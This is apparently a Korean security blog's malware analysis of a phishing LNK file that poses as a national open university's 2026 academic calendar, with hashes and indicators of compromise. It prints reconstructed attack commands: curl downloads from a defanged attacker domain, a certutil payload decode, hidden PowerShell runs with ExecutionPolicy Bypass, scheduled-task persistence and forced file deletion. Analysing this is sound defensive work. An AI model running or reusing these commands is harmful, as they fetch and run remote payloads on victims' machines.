오늘은 한국방송통신대학교 학사 일정 사칭 악성코드인 (첨부파일 1) 2026학년도 주요 학사일정 안내.lnk 에 대해서 알아보겠습니다.
파일명:(첨부파일 1) 2026학년도 주요 학사일정 안내.lnk
사이즈:1 MB
MD5:23b895522bef3c76879ee050d3564255
SHA-1:819dd13f0b16cf7769b79207bac9dbd3c1c3cf00
SHA-256:cce863d31f184108c7e38d6e76fb5ed4c04909c7a2c99039236dcc64af722dfe
악성코드 분석
먼저 해당 악성코드는 사용자가 실행했을 때 실행이 되는지 모르게 실행을 합니다.
C:\Users\Public\Pictures 에 먼저 파일 삭제 C:\Users\Public\Videos\ 에 작업 스케줄러에 등록 후 컴퓨터 실행 시 계속 실행을 하는 부분으로 나누어집니다.
1.미끼 파일 관련 부분

엑셀 파일로 이루어진 (첨부파일 1) 2026학년도 주요 학사일정 안내를 사용자에게 보여주는 것인데 일단 해당 파일을 열어보면 학사일정으로 해서 검색을 해보면 한국방송통신대학교 학사 일정하고 정확하게 맞아 들어가는 것을 볼 수가 있습니다.
2.PowerShell 분석(1단계)
select -Skip 부분에 보면 00017832부분에서 엑셀 파일을 추출하는 것을 볼 수가 있습니다.
시작 오프셋:10,322
길이:17,832 bytes
마지막 오프셋:28,153
3.원본 LNK 파일 삭제
이제는 악성코드를 실행하면 del $filepath 명령어를 통해서 원본 악성코드 인 lnk 파일을 삭제합니다.

4.작업스케줄러 생성
SCHTASKS /CREATE /TN "office365" /TR "taskpath" /SC MINUTE /MO 10 /F 명령어를 통해서 office365 이름으로 생성을 하고 나서 10분마다 공용 폴더에 무작위로 생성된 이름.vbs를 실행을 하게 돼 있습니다.
그냥 해당 부분 등을 파이썬으로 뽑아 보면 다음과 같은 결과 중에서 payload 2.bat 이름을 지은 부분이 실행합니다.
payload 2.bat 부분 분석

1.Bsae64 디코딩 결과
BASE64_STRING:c:\users\public\pictures\
BASE64_STRING2:hxxps://ntsgo(.)name/download/xt(ps1
BASE64_STRING3:hxxps://ntsgo(.)name/download/lc(py1
BASE64_STRING4:C:\users\public\pictures\ps(.)dat
BASE64_STRING5:hxxps://ntsgo(.)name/downl(o)ad/ps
BASE64_STRING6:C:\Users\Public\pictures\p2(.)ps1
BASE64_STRING7:hxxps://ntsgo(.)name/down(l)oad/pro
2.먼저 @echo off 명령어를 통해서 악성코드 실행을 할 때 출력이 되지 않게 해서 사용자로서는 어떤 동작이 이루어지는지 모름
setlocal enabledelayedexpansion 지연 환경 변수 사용하기 위한 목적
3.Base64 문자열 설정

Base64 로 주소 경로 등을 인코딩하고 있음 뭐~그냥 다시 한번 Base64 로 디코딩하면 되지만
4.PowerShell 코드를 이용한 Base64 복호화
PowerShell 실행을 하고 나서 Base64를 UTF-8 문자열로 바꾸고 나서 결과를 BAT 변수에 저장하는 역할
c:\users\public\pictures\ 으로 설정
PowerShell 7회 실행을 하면 Base64 문자열 7개를 각각 별도로 PowerShell로 복호화
5.무작위 파일명 생성
%random%부분에서 Windows CMD에서 0부터 32767 사이 값을 반환 처리합니다.
이를 세 번 이어붙여 긴 숫자 문자열을 만듭니다.
특이점 한 점은 s 파일과 r 파일이 같은 숫자 부분을 공유하고 있음

t,s,r 파일은 확장자가 없으며 확장자가 없다고 악성코드라는 것이 아니고 추가적인 행동을 할 수가 있음
6.Public Pictures 폴더 삭제
/q:빠르게 처리
/f:읽기 전용 파일 강제 삭제
/s:하위 디렉터리 포함 삭제
C:\Users\Public\Pictures 폴더에 존재하는 파일들을 삭제 처리합니다.
7.curl 사용을 해서 다운로드
복원 결과
curl -s --max-time 30 -o "C:\Users\Public\Pictures\t(랜덤)" "hxxps://ntsgo(.)name/download/xtp(s)1" &&
curl -s --max-time 30 -o "C:\Users\Public\Pictures\s(랜덤)" "hxxps://ntsgo(.)name/download/l(c)py1" &&
curl -s --max-time 30 -o "C:\Users\Public\Pictures\ps.dat" "hxxps://ntsgo(.)name/downl(o)ad/ps" &&
curl -s --max-time 30 -o "C:\Users\Public\Pictures\r(랜덤)" "hxxps://ntsgo(.)name/download/pro"
옵션
-s: 사용자 몰래 조용하게 실행 예를 들어 진행률이나 오류 출력 최소화하기 위한 목적
--max-time 30:최대 30초 까지만 대기
-o: 결과를 파일 저장
&&:앞 명령이 성공해야 다음 명령 실행을 하기 위한 목적
8.certutil 사용한 디코딩
certutil -decode "C:\users\public\pictures\ps.dat" "C:\Users\Public\pictures\p2.ps1"
다운로드한 ps(.)dat를 Base64 디코딩해서 p2(.)ps1로 저장
9.악성코드 마지막 PowerShell 실행
Start-Process ... -WindowStyle Hidden 사용해서 숨김 상태로 실행
실제 페이로드 실행 프로세스를 분리
ExecutionPolicy Bypass 반복 적용을 해서 실행 정책 우회
11.생성 및 삭제 파일
삭제 대상
C:\Users\Public\Pictures\
C:\Users\Public\Pictures\(하위폴더)\
파일 생성
C:\Users\Public\Pictures\t(랜덤숫자) /download/xtps1->응답 저장
C:\Users\Public\Pictures\s(랜덤숫자) /download/lcpy1->응답 저장
C:\Users\Public\Pictures\ps(.)dat /download/ps 응답 저장
C:\Users\Public\Pictures\r(랜덤숫자) /download/pro 응답 저장
C:\Users\Public\Pictures\p2.ps1,ps.dat를 디코딩 한 파워셀 코드
IOC
ntsgo(.)name
hxxps://ntsgo(.)name/download/xtps1
hxxps://ntsgo(.)name/download/lcpy1
hxxps://ntsgo(.)name/download/ps
hxxps://ntsgo(.)name/download/pro
C:\Users\Public\Pictures\ps.dat
C:\Users\Public\Pictures\p2.ps1
C:\Users\Public\Pictures\t(0-9)+
C:\Users\Public\Pictures\s(0-9)+
C:\Users\Public\Pictures\r(0-9)+
curl.exe -s --max-time 30 -o
certutil.exe -decode
powershell.exe -ExecutionPolicy Bypass
powershell.exe -File C:\Users\Public\pictures\p2.ps1
요약
사용자가 악성코드 LNK를 실행
사용자가 보이지 않는 상태에서 PowerShell 실행
현재 폴더의 자기 자신의 LNK를 바이트로 읽기 시작
내부에 삽입된 XLSX 를 추출->사용자에게 보이게 함 즉 사용자에게 미끼 파일을 실행해서 사용자를 속임
원본 LNK 삭제
C:\Users\Public\Videos\에 랜덤 이름.vbs,.bat,.ps1 생성
예약작업 office365 생성 및 등록 실행
VBS는 숨김 상태로 BAT 실행
BAT가 외부 서버에서 추가 파일 다운로드
certutil로 ps.dat 파일을 p2.ps1로 디코딩
사용자 몰래 PowerShell로 p2.ps1 실행
대충 이렇게 동작을 하고 사이트는 폭파되어서 더는 악성코드 분석 진행 불가
한국방송통신대학교 학생들을 노린 것이 아닌가? 매우 높게 판단함
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 281개의 무료 안드로이드 VPN 앱 트래픽 유출 암호화되지 않은 데이터 사용자 추적 문제가 발견 (0) | 2026.07.15 |
|---|---|
| Kimsuky(김수키) 전세 계약 특약 정리 위장한 악성코드-전세 계약 특약 정리.lnk (0) | 2026.07.13 |
| 김수키(Kimsuky)에서 만든 악성코드-UNIMAC Policy Letter 6 MACHA Visitors (0) | 2026.07.09 |
| 커뮤니티의 도움으로 Flipper Zero 펌웨어 개발이 계속 진행이 됨 (0) | 2026.07.08 |
| FBI 러시아 해커들이 현재 시그널(Signal) 백업 복구 키 그리고 북한 해커의 예상 공격 시나리오 (0) | 2026.07.04 |
| 김수키 에서 만든 악성코드-고객현황_202604.lnk (0) | 2026.07.01 |
| 윈도우 10 2027년10월까지 ESU 지원 연장 (0) | 2026.06.30 |
| Kimsuky 로 추정 되는 악성코드-[별첨1]_사고인지_유형별_증빙자료_예시-최종.lnk (0) | 2026.06.29 |





